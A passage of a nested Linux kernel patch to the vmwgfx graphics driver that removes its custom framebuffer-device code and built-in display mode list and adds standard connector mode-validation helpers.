+-	if (IS_ERR(vfb))
+-		return PTR_ERR(vfb);
+-
+-	par->set_fb = &vfb->base;
+-
+-	return 0;
+-}
+-
+-static int vmw_fb_set_par(struct fb_info *info)
+-{
+-	struct vmw_fb_par *par = info->par;
+-	struct vmw_private *vmw_priv = par->vmw_priv;
+-	struct drm_mode_set set;
+-	struct fb_var_screeninfo *var = &info->var;
+-	struct drm_display_mode new_mode = { DRM_MODE("fb_mode",
+-		DRM_MODE_TYPE_DRIVER,
+-		0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-		DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC)
+-	};
+-	struct drm_display_mode *mode;
+-	int ret;
+-
+-	mode = drm_mode_duplicate(&vmw_priv->drm, &new_mode);
+-	if (!mode) {
+-		DRM_ERROR("Could not create new fb mode.\n");
+-		return -ENOMEM;
+-	}
+-
+-	mode->hdisplay = var->xres;
+-	mode->vdisplay = var->yres;
+-	vmw_guess_mode_timing(mode);
+-
+-	if (!vmw_kms_validate_mode_vram(vmw_priv,
+-					mode->hdisplay *
+-					DIV_ROUND_UP(var->bits_per_pixel, 8),
+-					mode->vdisplay)) {
+-		drm_mode_destroy(&vmw_priv->drm, mode);
+-		return -EINVAL;
+-	}
+-
+-	mutex_lock(&par->bo_mutex);
+-	ret = vmw_fb_kms_framebuffer(info);
+-	if (ret)
+-		goto out_unlock;
+-
+-	par->fb_x = var->xoffset;
+-	par->fb_y = var->yoffset;
+-
+-	set.crtc = par->crtc;
+-	set.x = 0;
+-	set.y = 0;
+-	set.mode = mode;
+-	set.fb = par->set_fb;
+-	set.num_connectors = 1;
+-	set.connectors = &par->con;
+-
+-	ret = vmwgfx_set_config_internal(&set);
+-	if (ret)
+-		goto out_unlock;
+-
+-	vmw_fb_dirty_mark(par, par->fb_x, par->fb_y,
+-			  par->set_fb->width, par->set_fb->height);
+-
+-	/* If there already was stuff dirty we wont
+-	 * schedule a new work, so lets do it now */
+-
+-	schedule_delayed_work(&par->local_work, 0);
+-
+-out_unlock:
+-	if (par->set_mode)
+-		drm_mode_destroy(&vmw_priv->drm, par->set_mode);
+-	par->set_mode = mode;
+-
+-	mutex_unlock(&par->bo_mutex);
+-
+-	return ret;
+-}
+-
+-
+-static const struct fb_ops vmw_fb_ops = {
+-	.owner = THIS_MODULE,
+-	.fb_check_var = vmw_fb_check_var,
+-	.fb_set_par = vmw_fb_set_par,
+-	.fb_setcolreg = vmw_fb_setcolreg,
+-	.fb_fillrect = vmw_fb_fillrect,
+-	.fb_copyarea = vmw_fb_copyarea,
+-	.fb_imageblit = vmw_fb_imageblit,
+-	.fb_pan_display = vmw_fb_pan_display,
+-	.fb_blank = vmw_fb_blank,
+-	.fb_mmap = fb_deferred_io_mmap,
+-};
+-
+-int vmw_fb_init(struct vmw_private *vmw_priv)
+-{
+-	struct device *device = vmw_priv->drm.dev;
+-	struct vmw_fb_par *par;
+-	struct fb_info *info;
+-	unsigned fb_width, fb_height;
+-	unsigned int fb_bpp, fb_pitch, fb_size;
+-	struct drm_display_mode *init_mode;
+-	int ret;
+-
+-	fb_bpp = 32;
+-
+-	/* XXX As shouldn't these be as well. */
+-	fb_width = min(vmw_priv->fb_max_width, (unsigned)2048);
+-	fb_height = min(vmw_priv->fb_max_height, (unsigned)2048);
+-
+-	fb_pitch = fb_width * fb_bpp / 8;
+-	fb_size = fb_pitch * fb_height;
+-
+-	info = framebuffer_alloc(sizeof(*par), device);
+-	if (!info)
+-		return -ENOMEM;
+-
+-	/*
+-	 * Par
+-	 */
+-	vmw_priv->fb_info = info;
+-	par = info->par;
+-	memset(par, 0, sizeof(*par));
+-	INIT_DELAYED_WORK(&par->local_work, &vmw_fb_dirty_flush);
+-	par->vmw_priv = vmw_priv;
+-	par->vmalloc = NULL;
+-	par->max_width = fb_width;
+-	par->max_height = fb_height;
+-
+-	ret = vmw_kms_fbdev_init_data(vmw_priv, 0, par->max_width,
+-				      par->max_height, &par->con,
+-				      &par->crtc, &init_mode);
+-	if (ret)
+-		goto err_kms;
+-
+-	info->var.xres = init_mode->hdisplay;
+-	info->var.yres = init_mode->vdisplay;
+-
+-	/*
+-	 * Create buffers and alloc memory
+-	 */
+-	par->vmalloc = vzalloc(fb_size);
+-	if (unlikely(par->vmalloc == NULL)) {
+-		ret = -ENOMEM;
+-		goto err_free;
+-	}
+-
+-	/*
+-	 * Fixed and var
+-	 */
+-	strcpy(info->fix.id, "svgadrmfb");
+-	info->fix.type = FB_TYPE_PACKED_PIXELS;
+-	info->fix.visual = FB_VISUAL_TRUECOLOR;
+-	info->fix.type_aux = 0;
+-	info->fix.xpanstep = 1; /* doing it in hw */
+-	info->fix.ypanstep = 1; /* doing it in hw */
+-	info->fix.ywrapstep = 0;
+-	info->fix.accel = FB_ACCEL_NONE;
+-	info->fix.line_length = fb_pitch;
+-
+-	info->fix.smem_start = 0;
+-	info->fix.smem_len = fb_size;
+-
+-	info->pseudo_palette = par->pseudo_palette;
+-	info->screen_base = (char __iomem *)par->vmalloc;
+-	info->screen_size = fb_size;
+-
+-	info->fbops = &vmw_fb_ops;
+-
+-	/* 24 depth per default */
+-	info->var.red.offset = 16;
+-	info->var.green.offset = 8;
+-	info->var.blue.offset = 0;
+-	info->var.red.length = 8;
+-	info->var.green.length = 8;
+-	info->var.blue.length = 8;
+-	info->var.transp.offset = 0;
+-	info->var.transp.length = 0;
+-
+-	info->var.xres_virtual = fb_width;
+-	info->var.yres_virtual = fb_height;
+-	info->var.bits_per_pixel = fb_bpp;
+-	info->var.xoffset = 0;
+-	info->var.yoffset = 0;
+-	info->var.activate = FB_ACTIVATE_NOW;
+-	info->var.height = -1;
+-	info->var.width = -1;
+-
+-	/* Use default scratch pixmap (info->pixmap.flags = FB_PIXMAP_SYSTEM) */
+-	info->apertures = alloc_apertures(1);
+-	if (!info->apertures) {
+-		ret = -ENOMEM;
+-		goto err_aper;
+-	}
+-	info->apertures->ranges[0].base = vmw_priv->vram_start;
+-	info->apertures->ranges[0].size = vmw_priv->vram_size;
+-
+-	/*
+-	 * Dirty & Deferred IO
+-	 */
+-	par->dirty.x1 = par->dirty.x2 = 0;
+-	par->dirty.y1 = par->dirty.y2 = 0;
+-	par->dirty.active = true;
+-	spin_lock_init(&par->dirty.lock);
+-	mutex_init(&par->bo_mutex);
+-	info->fbdefio = &vmw_defio;
+-	fb_deferred_io_init(info);
+-
+-	ret = register_framebuffer(info);
+-	if (unlikely(ret != 0))
+-		goto err_defio;
+-
+-	vmw_fb_set_par(info);
+-
+-	return 0;
+-
+-err_defio:
+-	fb_deferred_io_cleanup(info);
+-err_aper:
+-err_free:
+-	vfree(par->vmalloc);
+-err_kms:
+-	framebuffer_release(info);
+-	vmw_priv->fb_info = NULL;
+-
+-	return ret;
+-}
+-
+-int vmw_fb_close(struct vmw_private *vmw_priv)
+-{
+-	struct fb_info *info;
+-	struct vmw_fb_par *par;
+-
+-	if (!vmw_priv->fb_info)
+-		return 0;
+-
+-	info = vmw_priv->fb_info;
+-	par = info->par;
+-
+-	/* ??? order */
+-	fb_deferred_io_cleanup(info);
+-	cancel_delayed_work_sync(&par->local_work);
+-	unregister_framebuffer(info);
+-
+-	mutex_lock(&par->bo_mutex);
+-	(void) vmw_fb_kms_detach(par, true, true);
+-	mutex_unlock(&par->bo_mutex);
+-
+-	vfree(par->vmalloc);
+-	framebuffer_release(info);
+-
+-	return 0;
+-}
+-
+-int vmw_fb_off(struct vmw_private *vmw_priv)
+-{
+-	struct fb_info *info;
+-	struct vmw_fb_par *par;
+-	unsigned long flags;
+-
+-	if (!vmw_priv->fb_info)
+-		return -EINVAL;
+-
+-	info = vmw_priv->fb_info;
+-	par = info->par;
+-
+-	spin_lock_irqsave(&par->dirty.lock, flags);
+-	par->dirty.active = false;
+-	spin_unlock_irqrestore(&par->dirty.lock, flags);
+-
+-	flush_delayed_work(&info->deferred_work);
+-	flush_delayed_work(&par->local_work);
+-
+-	return 0;
+-}
+-
+-int vmw_fb_on(struct vmw_private *vmw_priv)
+-{
+-	struct fb_info *info;
+-	struct vmw_fb_par *par;
+-	unsigned long flags;
+-
+-	if (!vmw_priv->fb_info)
+-		return -EINVAL;
+-
+-	info = vmw_priv->fb_info;
+-	par = info->par;
+-
+-	spin_lock_irqsave(&par->dirty.lock, flags);
+-	par->dirty.active = true;
+-	spin_unlock_irqrestore(&par->dirty.lock, flags);
+-
+-	/*
+-	 * Need to reschedule a dirty update, because otherwise that's
+-	 * only done in dirty_mark() if the previous coalesced
+-	 * dirty region was empty.
+-	 */
+-	schedule_delayed_work(&par->local_work, 0);
+-
+-	return 0;
+-}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index b1aed051b41ab..5b30e4ba2811a 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -31,6 +31,7 @@
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_rect.h>
+ #include <drm/drm_sysfs.h>
++#include <drm/drm_edid.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -1988,6 +1989,8 @@ int vmw_kms_init(struct vmw_private *dev_priv)
+ 	dev->mode_config.min_height = 1;
+ 	dev->mode_config.max_width = dev_priv->texture_max_width;
+ 	dev->mode_config.max_height = dev_priv->texture_max_height;
++	dev->mode_config.preferred_depth = dev_priv->assume_16bpp ? 16 : 32;
++	dev->mode_config.prefer_shadow_fbdev = !dev_priv->has_mob;
+ 
+ 	drm_mode_create_suggested_offset_properties(dev);
+ 	vmw_kms_create_hotplug_mode_update_property(dev_priv);
+@@ -2082,13 +2085,12 @@ int vmw_kms_write_svga(struct vmw_private *vmw_priv,
+ 	return 0;
+ }
+ 
++static
+ bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+-				uint32_t pitch,
+-				uint32_t height)
++				u64 pitch,
++				u64 height)
+ {
+-	return ((u64) pitch * (u64) height) < (u64)
+-		((dev_priv->active_display_unit == vmw_du_screen_target) ?
+-		 dev_priv->max_primary_mem : dev_priv->vram_size);
++	return (pitch * height) < (u64)dev_priv->vram_size;
+ }
+ 
+ /**
+@@ -2134,8 +2136,8 @@ static int vmw_du_update_layout(struct vmw_private *dev_priv,
+ 			du->gui_x = rects[du->unit].x1;
+ 			du->gui_y = rects[du->unit].y1;
+ 		} else {
+-			du->pref_width = 800;
+-			du->pref_height = 600;
++			du->pref_width  = VMWGFX_MIN_INITIAL_WIDTH;
++			du->pref_height = VMWGFX_MIN_INITIAL_HEIGHT;
+ 			du->pref_active = false;
+ 			du->gui_x = 0;
+ 			du->gui_y = 0;
+@@ -2162,13 +2164,13 @@ static int vmw_du_update_layout(struct vmw_private *dev_priv,
+ 		}
+ 		con->status = vmw_du_connector_detect(con, true);
+ 	}
+-
+-	drm_sysfs_hotplug_event(dev);
+ out_fini:
+ 	drm_modeset_drop_locks(&ctx);
+ 	drm_modeset_acquire_fini(&ctx);
+ 	mutex_unlock(&dev->mode_config.mutex);
+ 
++	drm_sysfs_hotplug_event(dev);
++
+ 	return 0;
+ }
+ 
+@@ -2211,107 +2213,6 @@ vmw_du_connector_detect(struct drm_connector *connector, bool force)
+ 		connector_status_connected : connector_status_disconnected);
+ }
+ 
+-static struct drm_display_mode vmw_kms_connector_builtin[] = {
+-	/* 640x480@60Hz */
+-	{ DRM_MODE("640x480", DRM_MODE_TYPE_DRIVER, 25175, 640, 656,
+-		   752, 800, 0, 480, 489, 492, 525, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 800x600@60Hz */
+-	{ DRM_MODE("800x600", DRM_MODE_TYPE_DRIVER, 40000, 800, 840,
+-		   968, 1056, 0, 600, 601, 605, 628, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1024x768@60Hz */
+-	{ DRM_MODE("1024x768", DRM_MODE_TYPE_DRIVER, 65000, 1024, 1048,
+-		   1184, 1344, 0, 768, 771, 777, 806, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 1152x864@75Hz */
+-	{ DRM_MODE("1152x864", DRM_MODE_TYPE_DRIVER, 108000, 1152, 1216,
+-		   1344, 1600, 0, 864, 865, 868, 900, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x720@60Hz */
+-	{ DRM_MODE("1280x720", DRM_MODE_TYPE_DRIVER, 74500, 1280, 1344,
+-		   1472, 1664, 0, 720, 723, 728, 748, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x768@60Hz */
+-	{ DRM_MODE("1280x768", DRM_MODE_TYPE_DRIVER, 79500, 1280, 1344,
+-		   1472, 1664, 0, 768, 771, 778, 798, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x800@60Hz */
+-	{ DRM_MODE("1280x800", DRM_MODE_TYPE_DRIVER, 83500, 1280, 1352,
+-		   1480, 1680, 0, 800, 803, 809, 831, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 1280x960@60Hz */
+-	{ DRM_MODE("1280x960", DRM_MODE_TYPE_DRIVER, 108000, 1280, 1376,
+-		   1488, 1800, 0, 960, 961, 964, 1000, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1280x1024@60Hz */
+-	{ DRM_MODE("1280x1024", DRM_MODE_TYPE_DRIVER, 108000, 1280, 1328,
+-		   1440, 1688, 0, 1024, 1025, 1028, 1066, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1360x768@60Hz */
+-	{ DRM_MODE("1360x768", DRM_MODE_TYPE_DRIVER, 85500, 1360, 1424,
+-		   1536, 1792, 0, 768, 771, 777, 795, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1440x1050@60Hz */
+-	{ DRM_MODE("1400x1050", DRM_MODE_TYPE_DRIVER, 121750, 1400, 1488,
+-		   1632, 1864, 0, 1050, 1053, 1057, 1089, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1440x900@60Hz */
+-	{ DRM_MODE("1440x900", DRM_MODE_TYPE_DRIVER, 106500, 1440, 1520,
+-		   1672, 1904, 0, 900, 903, 909, 934, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1600x1200@60Hz */
+-	{ DRM_MODE("1600x1200", DRM_MODE_TYPE_DRIVER, 162000, 1600, 1664,
+-		   1856, 2160, 0, 1200, 1201, 1204, 1250, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1680x1050@60Hz */
+-	{ DRM_MODE("1680x1050", DRM_MODE_TYPE_DRIVER, 146250, 1680, 1784,
+-		   1960, 2240, 0, 1050, 1053, 1059, 1089, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1792x1344@60Hz */
+-	{ DRM_MODE("1792x1344", DRM_MODE_TYPE_DRIVER, 204750, 1792, 1920,
+-		   2120, 2448, 0, 1344, 1345, 1348, 1394, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1853x1392@60Hz */
+-	{ DRM_MODE("1856x1392", DRM_MODE_TYPE_DRIVER, 218250, 1856, 1952,
+-		   2176, 2528, 0, 1392, 1393, 1396, 1439, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1920x1080@60Hz */
+-	{ DRM_MODE("1920x1080", DRM_MODE_TYPE_DRIVER, 173000, 1920, 2048,
+-		   2248, 2576, 0, 1080, 1083, 1088, 1120, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1920x1200@60Hz */
+-	{ DRM_MODE("1920x1200", DRM_MODE_TYPE_DRIVER, 193250, 1920, 2056,
+-		   2256, 2592, 0, 1200, 1203, 1209, 1245, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 1920x1440@60Hz */
+-	{ DRM_MODE("1920x1440", DRM_MODE_TYPE_DRIVER, 234000, 1920, 2048,
+-		   2256, 2600, 0, 1440, 1441, 1444, 1500, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 2560x1440@60Hz */
+-	{ DRM_MODE("2560x1440", DRM_MODE_TYPE_DRIVER, 241500, 2560, 2608,
+-		   2640, 2720, 0, 1440, 1443, 1448, 1481, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 2560x1600@60Hz */
+-	{ DRM_MODE("2560x1600", DRM_MODE_TYPE_DRIVER, 348500, 2560, 2752,
+-		   3032, 3504, 0, 1600, 1603, 1609, 1658, 0,
+-		   DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC) },
+-	/* 2880x1800@60Hz */
+-	{ DRM_MODE("2880x1800", DRM_MODE_TYPE_DRIVER, 337500, 2880, 2928,
+-		   2960, 3040, 0, 1800, 1803, 1809, 1852, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 3840x2160@60Hz */
+-	{ DRM_MODE("3840x2160", DRM_MODE_TYPE_DRIVER, 533000, 3840, 3888,
+-		   3920, 4000, 0, 2160, 2163, 2168, 2222, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* 3840x2400@60Hz */
+-	{ DRM_MODE("3840x2400", DRM_MODE_TYPE_DRIVER, 592250, 3840, 3888,
+-		   3920, 4000, 0, 2400, 2403, 2409, 2469, 0,
+-		   DRM_MODE_FLAG_PHSYNC | DRM_MODE_FLAG_NVSYNC) },
+-	/* Terminate */
+-	{ DRM_MODE("", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) },
+-};
+-
+ /**
+  * vmw_guess_mode_timing - Provide fake timings for a
+  * 60Hz vrefresh mode.
+@@ -2333,88 +2234,6 @@ void vmw_guess_mode_timing(struct drm_display_mode *mode)
+ }
+ 
+ 
+-int vmw_du_connector_fill_modes(struct drm_connector *connector,
+-				uint32_t max_width, uint32_t max_height)
+-{
+-	struct vmw_display_unit *du = vmw_connector_to_du(connector);
+-	struct drm_device *dev = connector->dev;
+-	struct vmw_private *dev_priv = vmw_priv(dev);
+-	struct drm_display_mode *mode = NULL;
+-	struct drm_display_mode *bmode;
+-	struct drm_display_mode prefmode = { DRM_MODE("preferred",
+-		DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED,
+-		0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
+-		DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC)
+-	};
+-	int i;
+-	u32 assumed_bpp = 4;
+-
+-	if (dev_priv->assume_16bpp)
+-		assumed_bpp = 2;
+-
+-	max_width  = min(max_width,  dev_priv->texture_max_width);
+-	max_height = min(max_height, dev_priv->texture_max_height);
+-
+-	/*
+-	 * For STDU extra limit for a mode on SVGA_REG_SCREENTARGET_MAX_WIDTH/
+-	 * HEIGHT registers.
+-	 */
+-	if (dev_priv->active_display_unit == vmw_du_screen_target) {
+-		max_width  = min(max_width,  dev_priv->stdu_max_width);
+-		max_height = min(max_height, dev_priv->stdu_max_height);
+-	}
+-
+-	/* Add preferred mode */
+-	mode = drm_mode_duplicate(dev, &prefmode);
+-	if (!mode)
+-		return 0;
+-	mode->hdisplay = du->pref_width;
+-	mode->vdisplay = du->pref_height;
+-	vmw_guess_mode_timing(mode);
+-	drm_mode_set_name(mode);
+-
+-	if (vmw_kms_validate_mode_vram(dev_priv,
+-					mode->hdisplay * assumed_bpp,
+-					mode->vdisplay)) {
+-		drm_mode_probed_add(connector, mode);
+-	} else {
+-		drm_mode_destroy(dev, mode);
+-		mode = NULL;
+-	}
+-
+-	if (du->pref_mode) {
+-		list_del_init(&du->pref_mode->head);
+-		drm_mode_destroy(dev, du->pref_mode);
+-	}
+-
+-	/* mode might be null here, this is intended */
+-	du->pref_mode = mode;
+-
+-	for (i = 0; vmw_kms_connector_builtin[i].type != 0; i++) {
+-		bmode = &vmw_kms_connector_builtin[i];
+-		if (bmode->hdisplay > max_width ||
+-		    bmode->vdisplay > max_height)
+-			continue;
+-
+-		if (!vmw_kms_validate_mode_vram(dev_priv,
+-						bmode->hdisplay * assumed_bpp,
+-						bmode->vdisplay))
+-			continue;
+-
+-		mode = drm_mode_duplicate(dev, bmode);
+-		if (!mode)
+-			return 0;
+-
+-		drm_mode_probed_add(connector, mode);
+-	}
+-
+-	drm_connector_list_update(connector);
+-	/* Move the prefered mode first, help apps pick the right mode. */
+-	drm_mode_sort(&connector->modes);
+-
+-	return 1;
+-}
+-
+ /**
+  * vmw_kms_update_layout_ioctl - Handler for DRM_VMW_UPDATE_LAYOUT ioctl
+  * @dev: drm device for the ioctl
+@@ -2448,10 +2267,9 @@ int vmw_kms_update_layout_ioctl(struct drm_device *dev, void *data,
+ 	int ret, i;
+ 
+ 	if (!arg->num_outputs) {
+-		struct drm_rect def_rect = {0, 0, 800, 600};
+-		VMW_DEBUG_KMS("Default layout x1 = %d y1 = %d x2 = %d y2 = %d\n",
+-			      def_rect.x1, def_rect.y1,
+-			      def_rect.x2, def_rect.y2);
++		struct drm_rect def_rect = {0, 0,
++					    VMWGFX_MIN_INITIAL_WIDTH,
++					    VMWGFX_MIN_INITIAL_HEIGHT};
+ 		vmw_du_update_layout(dev_priv, 1, &def_rect);
+ 		return 0;
+ 	}
+@@ -2746,68 +2564,6 @@ int vmw_kms_update_proxy(struct vmw_resource *res,
+ 	return 0;
+ }
+ 
+-int vmw_kms_fbdev_init_data(struct vmw_private *dev_priv,
+-			    unsigned unit,
+-			    u32 max_width,
+-			    u32 max_height,
+-			    struct drm_connector **p_con,
+-			    struct drm_crtc **p_crtc,
+-			    struct drm_display_mode **p_mode)
+-{
+-	struct drm_connector *con;
+-	struct vmw_display_unit *du;
+-	struct drm_display_mode *mode;
+-	int i = 0;
+-	int ret = 0;
+-
+-	mutex_lock(&dev_priv->drm.mode_config.mutex);
+-	list_for_each_entry(con, &dev_priv->drm.mode_config.connector_list,
+-			    head) {
+-		if (i == unit)
+-			break;
+-
+-		++i;
+-	}
+-
+-	if (&con->head == &dev_priv->drm.mode_config.connector_list) {
+-		DRM_ERROR("Could not find initial display unit.\n");
+-		ret = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	if (list_empty(&con->modes))
+-		(void) vmw_du_connector_fill_modes(con, max_width, max_height);
+-
+-	if (list_empty(&con->modes)) {
+-		DRM_ERROR("Could not find initial display mode.\n");
+-		ret = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	du = vmw_connector_to_du(con);
+-	*p_con = con;
+-	*p_crtc = &du->crtc;
+-
+-	list_for_each_entry(mode, &con->modes, head) {
+-		if (mode->type & DRM_MODE_TYPE_PREFERRED)
+-			break;
+-	}
+-
+-	if (&mode->head == &con->modes) {
+-		WARN_ONCE(true, "Could not find initial preferred mode.\n");
+-		*p_mode = list_first_entry(&con->modes,
+-					   struct drm_display_mode,
+-					   head);
+-	} else {
+-		*p_mode = mode;
+-	}
+-
+- out_unlock:
+-	mutex_unlock(&dev_priv->drm.mode_config.mutex);
+-
+-	return ret;
+-}
+-
+ /**
+  * vmw_kms_create_implicit_placement_property - Set up the implicit placement
+  * property.
+@@ -3006,3 +2762,84 @@ int vmw_du_helper_plane_update(struct vmw_du_update_plane *update)
+ 	vmw_validation_unref_lists(&val_ctx);
+ 	return ret;
+ }
++
++/**
++ * vmw_connector_mode_valid - implements drm_connector_helper_funcs.mode_valid callback
++ *
++ * @connector: the drm connector, part of a DU container
++ * @mode: drm mode to check
++ *
++ * Returns MODE_OK on success, or a drm_mode_status error code.
++ */
++enum drm_mode_status vmw_connector_mode_valid(struct drm_connector *connector,
++					      struct drm_display_mode *mode)
++{
++	enum drm_mode_status ret;
++	struct drm_device *dev = connector->dev;
++	struct vmw_private *dev_priv = vmw_priv(dev);
++	u32 assumed_cpp = 4;
++
++	if (dev_priv->assume_16bpp)
++		assumed_cpp = 2;
++
++	ret = drm_mode_validate_size(mode, dev_priv->texture_max_width,
++				     dev_priv->texture_max_height);
++	if (ret != MODE_OK)
++		return ret;
++
++	if (!vmw_kms_validate_mode_vram(dev_priv,
++					mode->hdisplay * assumed_cpp,
++					mode->vdisplay))
++		return MODE_MEM;
++
++	return MODE_OK;
++}
++
++/**
++ * vmw_connector_get_modes - implements drm_connector_helper_funcs.get_modes callback
++ *
++ * @connector: the drm connector, part of a DU container
++ *
++ * Returns the number of added modes.
++ */
++int vmw_connector_get_modes(struct drm_connector *connector)
++{
++	struct vmw_display_unit *du = vmw_connector_to_du(connector);
++	struct drm_device *dev = connector->dev;
++	struct vmw_private *dev_priv = vmw_priv(dev);
++	struct drm_display_mode *mode = NULL;
++	struct drm_display_mode prefmode = { DRM_MODE("preferred",
++		DRM_MODE_TYPE_DRIVER | DRM_MODE_TYPE_PREFERRED,
++		0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
++		DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_PVSYNC)
++	};
++	u32 max_width;
++	u32 max_height;
++	u32 num_modes;
++
++	/* Add preferred mode */
++	mode = drm_mode_duplicate(dev, &prefmode);
++	if (!mode)
++		return 0;
++
++	mode->hdisplay = du->pref_width;
++	mode->vdisplay = du->pref_height;
++	vmw_guess_mode_timing(mode);
++	drm_mode_set_name(mode);
++
++	drm_mode_probed_add(connector, mode);
++	drm_dbg_kms(dev, "preferred mode " DRM_MODE_FMT "\n", DRM_MODE_ARG(mode));
++
++	/* Probe connector for all modes not exceeding our geom limits */
++	max_width  = dev_priv->texture_max_width;
++	max_height = dev_priv->texture_max_height;
++
++	if (dev_priv->active_display_unit == vmw_du_screen_target) {
++		max_width  = min(dev_priv->stdu_max_width,  max_width);
++		max_height = min(dev_priv->stdu_max_height, max_height);
++	}
++
++	num_modes = 1 + drm_add_modes_noedid(connector, max_width, max_height);
++
++	return num_modes;
++}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index b116600b343a8..1099de1ece4b3 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -379,7 +379,6 @@ struct vmw_display_unit {
+ 	unsigned pref_width;
+ 	unsigned pref_height;
+ 	bool pref_active;
+-	struct drm_display_mode *pref_mode;
+ 
+ 	/*
+ 	 * Gui positioning
+@@ -429,8 +428,6 @@ void vmw_du_connector_save(struct drm_connector *connector);
+ void vmw_du_connector_restore(struct drm_connector *connector);
+ enum drm_connector_status
+ vmw_du_connector_detect(struct drm_connector *connector, bool force);
+-int vmw_du_connector_fill_modes(struct drm_connector *connector,
+-				uint32_t max_width, uint32_t max_height);
+ int vmw_kms_helper_dirty(struct vmw_private *dev_priv,
+ 			 struct vmw_framebuffer *framebuffer,
+ 			 const struct drm_clip_rect *clips,
+@@ -439,6 +436,9 @@ int vmw_kms_helper_dirty(struct vmw_private *dev_priv,
+ 			 int num_clips,
+ 			 int increment,
+ 			 struct vmw_kms_dirty *dirty);
++enum drm_mode_status vmw_connector_mode_valid(struct drm_connector *connector,
++					      struct drm_display_mode *mode);
++int vmw_connector_get_modes(struct drm_connector *connector);
+ 
+ void vmw_kms_helper_validation_finish(struct vmw_private *dev_priv,
+ 				      struct drm_file *file_priv,
+@@ -458,13 +458,6 @@ vmw_kms_new_framebuffer(struct vmw_private *dev_priv,
+ 			struct vmw_surface *surface,
+ 			bool only_2d,
+ 			const struct drm_mode_fb_cmd2 *mode_cmd);
+-int vmw_kms_fbdev_init_data(struct vmw_private *dev_priv,
+-			    unsigned unit,
+-			    u32 max_width,
+-			    u32 max_height,
+-			    struct drm_connector **p_con,
+-			    struct drm_crtc **p_crtc,
+-			    struct drm_display_mode **p_mode);
+ void vmw_guess_mode_timing(struct drm_display_mode *mode);
+ void vmw_kms_update_implicit_fb(struct vmw_private *dev_priv);
+ void vmw_kms_create_implicit_placement_property(struct vmw_private *dev_priv);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+index ac72c20715f32..fdaf7d28cb211 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+@@ -263,7 +263,7 @@ static void vmw_ldu_connector_destroy(struct drm_connector *connector)
+ static const struct drm_connector_funcs vmw_legacy_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+-	.fill_modes = vmw_du_connector_fill_modes,
++	.fill_modes = drm_helper_probe_single_connector_modes,
+ 	.destroy = vmw_ldu_connector_destroy,
+ 	.reset = vmw_du_connector_reset,
+ 	.atomic_duplicate_state = vmw_du_connector_duplicate_state,
